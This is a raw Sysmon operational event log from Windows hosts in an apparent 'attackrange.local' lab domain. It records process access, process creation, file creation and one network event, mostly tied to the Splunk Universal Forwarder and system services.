08:01:50.294{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052451Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:50.294{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052450Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:50.294{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052449Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:50.294{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F6EE-60EB-AE7D-00000000CF01}9336C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052448Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:50.294{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F6EE-60EB-AE7D-00000000CF01}9336C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001052447Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:50.279{466BC892-F6EE-60EB-AE7D-00000000CF01}9336C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001052476Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:51.774{466BC892-F6EF-60EB-B07D-00000000CF01}172410156C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001052475Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:51.659{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=051914692A94636B1EA63DAB9433BF2F,SHA256=668ADC157CFA01B50655D1AD94F32CB75C6CF1057F4CB6A0EED8E2870CBC3CC4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809309Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:51.333{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=352EA5F0FFB351F769522F28C8FA8DD6,SHA256=6539D0EADFAA37098CEADEDAC809101E45A9AA3729C5E2D2BBF264615F01988A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052474Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:51.511{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F6EF-60EB-B07D-00000000CF01}1724C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052473Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:51.511{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052472Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:51.511{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052471Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:51.511{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052470Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:51.511{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052469Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:51.511{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F6EF-60EB-B07D-00000000CF01}1724C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052468Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:51.511{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F6EF-60EB-B07D-00000000CF01}1724C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001052467Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:51.497{466BC892-F6EF-60EB-B07D-00000000CF01}1724C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001052466Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:51.280{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BA84AB504AB2019ED84BF904FA704C19,SHA256=A47FB4B0B475CCF21F8FD45D751D4DDCE4938A6CBF699AEA6498EB6F8A338968,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052465Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:51.280{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=21A8840F5D04660D44A3DBB8196118A9,SHA256=84A6ABA4A70700208502222F1B133CA09C13BBBAC0ED5E851750FA88B9957374,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052496Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:52.865{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F6F0-60EB-B27D-00000000CF01}3492C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052495Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:52.865{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052494Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:52.865{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052493Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:52.865{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052492Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:52.865{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052491Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:52.849{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F6F0-60EB-B27D-00000000CF01}3492C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052490Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:52.849{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F6F0-60EB-B27D-00000000CF01}3492C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001052489Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:52.850{466BC892-F6F0-60EB-B27D-00000000CF01}3492C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000001052488Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:44.846{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal57388-false10.0.1.14win-dc-890.attackrange.local49676- 23542300x80000000000000001052487Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:52.663{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7B0241E9E32CC1C12355BB4D8E3A686F,SHA256=3D6566B13A5EF3903C8A2EAB1BCC5049382DC2E2C93706BA2B281A6BB9D33C47,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809313Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:52.348{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=233D9037086DBD61A8CD89DC07FCECF5,SHA256=4D7463DDBFEC78E6AA69C3F6975800CF2B001152E74F7CA8DA565205E35E340E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052486Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:52.501{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BA84AB504AB2019ED84BF904FA704C19,SHA256=A47FB4B0B475CCF21F8FD45D751D4DDCE4938A6CBF699AEA6498EB6F8A338968,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052485Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:52.485{466BC892-F6F0-60EB-B17D-00000000CF01}26606296C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052484Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 